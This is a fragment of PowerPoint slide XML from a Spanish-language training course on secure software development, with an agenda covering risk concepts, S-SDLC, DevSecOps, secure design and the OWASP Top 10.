              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45BB2B7F-9AE1-2BD8-7B27-88DC3E9627EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="536871" y="2217220"/>
            <a:ext cx="3679136" cy="1522963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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s-ES" sz="1800" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>La aplicación de un modelo de desarrollo software seguro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>reduce las vulnerabilidades.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3" descr="Gráfico, Gráfico en cascada&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4CD9D9A-41C0-0381-B71F-7FDE4B541BAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5047242" y="1382927"/>
            <a:ext cx="5618357" cy="3379718"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Imagen 6" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07B84024-C70F-5EC1-2D59-10555B5CA84B}"/>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672059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5ED9545-51F3-EC8F-3BA7-7C5EE5AF5393}"/>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DA1F856E-C0B6-D68C-6A8E-B7AA4D1E1454}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-7125"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5A5F847-C8DD-3427-3F95-D7B91DC5EBAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="144590" y="2694860"/>
            <a:ext cx="6217920" cy="2616101"/>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2.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="193330"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CONCEPTOS BÁSICOS DE SEGURIDAD Y RIESGO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0276D684-1936-E736-D4EC-45F8CAAE8A59}"/>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Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30FDA5C7-2F6C-2E7B-43C2-E71412D7A41C}"/>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99173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4-16BF-E640-6791-0BB258BFCE5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6A82ED5-AFF7-C6FA-4421-798DE6171ECB}"/>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1976A0C-2C4E-C29B-E614-6AE390C5F1DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="251936"/>
            <a:ext cx="9884664" cy="138499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Tipos de Seguridad:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Seguridad Física</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37878F75-7A71-7B80-16B4-42510E6961B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5" name="Imagen 4" descr="Diagrama&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2E4CB85-855D-0A26-AADE-00DE6F97832B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect t="14015"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1963348" y="1734937"/>
            <a:ext cx="8265303" cy="4048252"/>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E6EB44AF-6F17-A8A8-9AE9-594E62C0031C}"/>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73034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8097B-E121-8000-6C4F-D8D993E8D4E1}"/>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B763E49-421A-FC28-9141-6DA9446E463C}"/>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0D392BB-98FD-11AD-263F-5308CD5C8AC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="251936"/>
            <a:ext cx="9884664" cy="138499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Tipos de Seguridad:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Seguridad Lógica</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4C471C5-C448-272E-3C52-0A390A6A605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9" name="Imagen 8" descr="Interfaz de usuario gráfica, Diagrama&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4C2EABB-CC22-F750-20C4-F83C5372C38D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2544193" y="1888868"/>
            <a:ext cx="7103613" cy="3538620"/>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F66B3458-4690-2549-AD90-749EE52CAC41}"/>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852130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79452-82B5-0838-F6A9-0EA13FC4BBE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061978D-E702-B0CA-BB55-67F7F771177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17BEAF3-D6F3-306F-EDED-8FA4BCB6AAEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="251936"/>
            <a:ext cx="9500616"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rgbClr val="193330"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ÍNDICE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{748EA298-37F3-5317-C3E2-CEB66E89DE5B}"/>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3" name="Tabla 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B563A08-7631-2E5F-F251-5415557BF2C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1837851327"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1139007" y="1160409"/>
          <a:ext cx="4071350" cy="4623011"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4071350">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="797176931"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="739170">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1: Introducción</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Presentación de la jornada de formación.</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Importancia de la programación segura.</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Definiciones claves.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="900" b="1" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>​</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="49223" marR="49223" marT="24612" marB="2461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401"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rgbClr val="EAEAEA"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="758974838"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1087834">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2: Conceptos básicos de seguridad y riesgo</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Definición y tipos de seguridad: física, lógica, organizativa.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Principios de seguridad informática: confidencialidad, integridad, disponibilidad (CIA).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Evaluación y gestión de riesgos.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="900" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="595959"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>​</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="49223" marR="49223" marT="24612" marB="2461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321557185"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1320278">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="base">
                        <a:lnSpc>
                          <a:spcPts val="1650"/>
                        </a:lnSpc>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-ES" sz="900" b="1" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Módulo 3: Conceptos técnicos de Ciberseguridad </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="900" b="0" i="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Ciberseguridad y su importancia.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="900" b="0" i="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Amenazas comunes y su mitigación.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="900" b="0" i="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Ejemplos de ataques cibernéticos y cómo se podrían haber prevenido. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="900" b="0" i="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Práctica: identificación de amenazas en un escenario proporcionado.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="900" b="0" i="0">
                          <a:solidFill>
                            <a:srgbClr val="595959"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>​</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="49223" marR="49223" marT="24612" marB="2461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94590021"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1204056">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4: Ciclo de vida de desarrollo software seguro (S-SDLC)</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Concepto y fases del S-SDLC.</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Integración de la seguridad en cada fase del ciclo de vida.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Herramientas y técnicas para el S-SDLC.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Gobernanza en el desarrollo seguro. Auditorías y gestión de vulnerabilidades.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="900" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="595959"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>​</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="49223" marR="49223" marT="24612" marB="2461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FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="6401" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:srgbClr val="595959"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2562537330"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Tabla 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8D5EFAB-FF34-A1A0-4FB7-A8AFEDA44B4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1745005344"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5859035" y="1160409"/>
          <a:ext cx="4071349" cy="4623011"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4071349">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3576638827"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1246008">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5: Seguridad aplicada a procedimientos: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="900" b="1" i="0" u="none" strike="noStrike" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>DevSecOps</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Introducción al concepto de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="900" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>DevSecOps</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="900" b="0" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. </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Integración de la seguridad en el ciclo de vida DevOps.</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Herramientas y técnicas para </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="900" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>DevSecOps</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="900" b="0" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. </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Implementación de procedimientos de seguridad en un escenario DevOps.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="900" b="1" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>​</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="53511" marR="53511" marT="26756" marB="26756">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401"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rgbClr val="EAEAEA"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4247539180"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1002021">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6: Seguridad aplicada a diseño: Arquitectura</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Principios de diseño seguro.</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Revisión de patrones de diseño seguro.</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Diseño de una arquitectura segura para un sistema específico.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="900" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="595959"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>​</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="53511" marR="53511" marT="26756" marB="26756">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840508422"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1420135">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="base">
                        <a:lnSpc>
                          <a:spcPts val="1650"/>
                        </a:lnSpc>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-ES" sz="900" b="1" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Módulo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="900" b="1" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> 7: OWASP Top 10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Presentación de OWASP y su Top 10.</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Análisis de cada amenaza, su impacto y cómo prevenirla.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Otras amenazas: CSRF.</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Práctica: Identificación y explotación de amenazas del Top 10 de OWASP. Análisis del riesgo y </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="900" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>solventación</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="900" b="0" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="900" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="595959"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>​</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="53511" marR="53511" marT="26756" marB="26756">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644379595"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="954847">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="base">
                        <a:lnSpc>
                          <a:spcPts val="1650"/>
                        </a:lnSpc>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-ES" sz="900" b="1" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Módulo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="900" b="1" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> 8: Cierre</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Resumen de la jornada y puntos clave aprendidos.</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Espacio para preguntas y debate.</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Evaluación de la formación y </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="900" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>feedback</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="900" b="0" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="900" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="595959"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>​</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="53511" marR="53511" marT="26756" marB="26756">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FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="6401" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:srgbClr val="595959"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="862283545"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{278378B5-1294-E85D-23F7-92AF1BBB8FB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5094288" y="50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s-ES" altLang="es-E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7" name="Imagen 6" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7359ECEB-F741-D501-2548-F1FC6AC1198D}"/>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01612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93735-7EEB-358D-9533-BAAA8A01A9D9}"/>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90A4BB2E-A6ED-9090-6CB8-22C22D7BD14B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:duotone>
